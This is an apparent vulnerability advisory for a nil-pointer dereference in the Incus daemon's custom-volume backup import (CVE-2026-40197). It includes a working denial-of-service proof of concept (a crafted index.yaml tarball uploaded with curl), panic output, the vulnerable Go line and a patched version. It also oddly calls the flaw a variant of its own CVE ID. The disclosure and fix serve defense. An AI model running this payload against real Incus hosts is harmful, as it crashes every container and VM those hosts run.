Incus daemon, Nil-Pointer Dereference, CVE-2026-40197 (Medium) -DC-Jun2026-687


The vulnerability exists in the `(backend).CreateCustomVolumeFromBackup` function within internal/server/storage/backend.go. This function processes imported custom-volume backups and is responsible for creating volume snapshots from the backup metadata. The flaw lies in an unguarded dereference of the `ExpiresAt` field, which is a `time.Time` pointer, for each volume-snapshot entry in the backup index.
During the import process, the function iterates over srcBackup.Config.VolumeSnapshots. A prior fix for a related issue (GHSA-r7w7-mmxr-47r9) added an `if s == nil` check at the top of the loop to guard against nil snapshot pointers. However, this check does not protect against a nil `ExpiresAt` field within a non-nil snapshot struct. Approximately 19 lines later, the code directly dereferences `snapshot.ExpiresAt` without verifying that the pointer is non-nil.
An attacker can exploit this by creating a backup tarball containing an `index.yaml` file where the `volume_snapshots` entry omits the `expires_at` field. When this tarball is uploaded via the REST API endpoint POST /1.0/storage-pools/<pool>/volumes/custom, the daemon parses the YAML, and the `CreateCustomVolumeFromBackup` function proceeds to dereference the nil `ExpiresAt` pointer. This triggers a runtime panic with a segmentation violation, crashing the entire `incusd` process.
The crash results in a denial of service, aborting all ongoing container, VM, and storage operations on the host. In a clustered environment, the impact extends to the entire cluster member. The attack requires only that the user has the `can_create_storage_volumes` permission on any project, which is not limited to administrative users. The vulnerability is a sibling-field variant of CVE-2026-40197, and the affected code path lacks the nil-check that is present in other consumers of the same field within the file.

DailyCVE Form:

Platform: Incus
Version: 7.0.0, 6.0.x
Vulnerability: Nil-Pointer Dereference
Severity: Medium (CVSS 6.5)
Date: 2026-06-26

Prediction: 2026-07-10

What Undercode Say:

Analysis of the vulnerability reveals an asymmetric guard pattern. While other functions such as `CreateInstanceFromBackup` and the migration path correctly check `snapshot.ExpiresAt` for nil before dereferencing, the `CreateCustomVolumeFromBackup` function misses this check. The following bash commands and code snippets demonstrate the issue:

```bash
# Create a minimal backup tarball whose snapshot entry omits expires_at
cat > index.yaml <<EOF
name: poc-vol
backend: dir
pool: default
type: custom
optimized: false
optimized_header: false
snapshots: []
config:
  volume: {name: poc-vol, type: custom, content_type: filesystem, config: {}}
  volume_snapshots:
  - name: snap0
    description: snap0
    config: {}
EOF
tar -czf poc-vol.tar.gz index.yaml

# Upload the malformed backup to trigger the crash
curl -s --unix-socket /var/lib/incus/unix.socket -X POST \
  --data-binary @poc-vol.tar.gz \
  -H 'Content-Type: application/octet-stream' \
  -H 'X-Incus-name: poc-vol' \
  http://incus/1.0/storage-pools/default/volumes/custom
```

The daemon panic output confirms the crash:

```text
panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x0 pc=0x162b938]
goroutine 422 [running]:
github.com/lxc/incus/v7/internal/server/storage.(backend).CreateCustomVolumeFromBackup(...)
        /build/incus/internal/server/storage/backend.go:7731 +0xb48
```

The vulnerable code at `backend.go:7731` directly dereferences `snapshot.ExpiresAt` without a nil-check:

```go
// snapshot.ExpiresAt is a *time.Time; the deref below is unconditional
err = VolumeDBCreate(b, srcBackup.Project, fullSnapName, snapshot.Description,
	snapVol.Type(), true, snapVol.Config(), snapshot.CreatedAt,
	*snapshot.ExpiresAt, // <-- panics when expires_at is omitted from index.yaml
	snapVol.ContentType(), true, true)
```

Exploit:

An authenticated attacker with the `can_create_storage_volumes` entitlement on any project can exploit this vulnerability. The attacker crafts a backup tarball with an `index.yaml` file that includes a `volume_snapshots` entry lacking the `expires_at` field. The tarball is then uploaded to the Incus REST API endpoint using a POST request with `Content-Type: application/octet-stream` and the `X-Incus-name` header. Upon processing, the daemon panics and crashes, leading to a denial of service. Repeated requests can maintain the crash state, requiring manual operator intervention to restart the daemon.

Protection:

The immediate protection is to apply the suggested fix, which mirrors the nil-check pattern already used in other parts of the codebase. The fix adds a guard before dereferencing `snapshot.ExpiresAt`, so an omitted `expires_at` maps to the zero `time.Time` instead of a crash:

```go
// A nil ExpiresAt means the snapshot never expires; use the zero time.Time.
var snapExpiryDate time.Time
if snapshot.ExpiresAt != nil {
	snapExpiryDate = *snapshot.ExpiresAt
}

err = VolumeDBCreate(b, srcBackup.Project, fullSnapName, snapshot.Description,
	snapVol.Type(), true, snapVol.Config(), snapshot.CreatedAt,
	snapExpiryDate, snapVol.ContentType(), true, true)
```
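To show the defect and the fix side by side in isolation, here is an added Go example that is not Incus code: the `VolumeSnapshot` type and the function names are assumptions standing in for the decoded index.yaml entry, and the loop mirrors the import path's nil-entry skip followed by the nil-safe expiry accessor.

```go
package main

import (
	"fmt"
	"time"
)
// VolumeSnapshot stands in for a snapshot entry decoded from index.yaml:
// expires_at is optional, so it decodes to a pointer that is nil when the
// key is omitted. Names are assumptions, not Incus's own types.
type VolumeSnapshot struct {
	Name      string
	ExpiresAt *time.Time
}

// unguardedExpiry is the vulnerable pattern: a bare dereference that
// panics whenever expires_at was omitted.
func unguardedExpiry(s *VolumeSnapshot) time.Time {
	return *s.ExpiresAt
}

// guardedExpiry is the fix pattern: nil maps to the zero time.Time,
// which the storage layer treats as "never expires".
func guardedExpiry(s *VolumeSnapshot) time.Time {
	var expiry time.Time
	if s.ExpiresAt != nil {
		expiry = *s.ExpiresAt
	}
	return expiry
}

// importSnapshots mirrors the import loop: nil entries are skipped (the
// earlier GHSA fix) and every expiry goes through the nil-safe accessor.
func importSnapshots(snaps []*VolumeSnapshot) map[string]time.Time {
	out := make(map[string]time.Time)
	for _, s := range snaps {
		if s == nil {
			continue
		}
		out[s.Name] = guardedExpiry(s)
	}
	return out
}

func main() {
	exp := time.Date(2026, 7, 1, 0, 0, 0, 0, time.UTC)
	snaps := []*VolumeSnapshot{{Name: "snap0", ExpiresAt: &exp}, {Name: "snap1"}, nil} // constructed input
	defer func() { fmt.Println("unguarded path panicked:", recover() != nil) }()
	fmt.Println("guarded import:", importSnapshots(snaps))
	unguardedExpiry(snaps[1]) // panics; the deferred recover reports it
}
```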

Until the patch is applied, administrators can mitigate the risk by restricting the `can_create_storage_volumes` permission to only trusted users and monitoring for unusual backup upload activities. Upgrading to a patched version once available is the recommended long-term solution.

Impact:

  • Denial of Service: Successful exploitation crashes the entire `incusd` process, aborting all container, VM, and storage operations on the host. In clustered setups, the impact affects the entire cluster member.
  • Privileges Required: Low – any authenticated user with `can_create_storage_volumes` on any project can trigger the crash. This permission is not restricted to administrative users.
  • Network Attack Surface: The vulnerability is exploitable over the Incus REST API, which is typically exposed on TCP port 8443 or via the Unix socket.
  • CWE-476: Nil-Pointer Dereference. The CVSS score is estimated at 6.5 (Medium) with the vector AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H.

Sources:

Reported By: github.com